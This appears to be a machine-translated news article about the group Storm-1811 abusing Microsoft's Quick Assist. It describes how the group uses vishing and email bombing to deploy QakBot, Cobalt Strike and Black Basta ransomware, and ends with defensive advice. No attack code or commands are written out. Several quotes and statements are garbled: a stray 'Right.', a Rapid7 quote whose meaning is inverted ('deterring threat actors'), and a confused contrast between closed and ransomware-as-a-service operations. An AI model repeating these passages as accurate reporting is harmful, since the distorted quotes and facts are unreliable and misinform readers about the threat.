Cybercriminals exploit Microsoft’s Quick Assist feature for ransomware attacks

ReportMay 16, 2024Editorial DepartmentRansomware/incident response

Microsoft’s threat intelligence team said it has observed a threat actor being tracked by that name Storm 1811 Abuse of the client management tool Quick Assist to target users in social engineering attacks.

“Storm-1811 is a financially motivated cybercriminal organization known for deploying the Black Basta ransomware,” the company said in a report published on May 15, 2024.

The attack chain involves simulating voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, then spreading QakBot, Cobalt Strike, and ultimately the Black Basta ransomware.

The tech giant said: “Threat actors are abusing the Quick Assist feature to perform social engineering attacks, such as impersonating a trusted contact such as Microsoft technical support or an IT professional at the target user’s company to gain initial access to the target device. Right.”

Quick Assist is a legitimate application from Microsoft that enables users to share their Windows or macOS devices with others through remote connections, with the main purpose of solving technical problems on the system. It comes pre-installed on devices running Windows 11.

To make the attack more convincing, threat actors launch link list attacks, an email bombing attack in which target email addresses sign up for various legitimate email subscription services to flood their inboxes with subscription content box.

The attackers then called the target users, pretending to be the company’s IT support team, offering help fixing the spam problem, and convincing them to grant access to their devices through quick assistance.

“Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver the malicious payload,” the Windows maker said.

“Storm-1811 exploits its access and performs further keyboard activity, such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware across the network.”

Microsoft said it is closely monitoring the misuse of Quick Assist in these attacks and is working to include warning messages in the software to notify users of possible technical support scams that facilitate the delivery of ransomware.

Rapid7 said the campaign is believed to have started in mid-April 2024 and targeted multiple industries and verticals, including manufacturing, construction, food and beverage, and transportation, indicating the opportunistic nature of the attacks.

Robert Knapp, senior manager of incident response, said: “The low barrier to entry for carrying out these attacks, combined with the significant impact these attacks have on their victims, continues to be a critical factor in deterring threat actors seeking a payday. effective measures.

Microsoft also describes Black Basta as a “closed ransomware product” rather than a ransomware-as-a-service (RaaS) operation, which consists of a network of core developers, affiliates and initial access brokers that conduct ransomware and ransomware attacks. .

The company said it is “distributed by a small number of threat actors who often rely on other threat actors for initial access, malicious infrastructure and malware development.”

“Since Black Basta first emerged in April 2022, Black Basta attackers have deployed ransomware after receiving access to QakBot and other malware distributors, highlighting the need for organizations to pay attention to attacks before deploying ransomware stage to reduce threats.

Organizations are advised to block or uninstall unused Quick Assist and similar remote monitoring and management tools, and train employees to recognize tech support scams.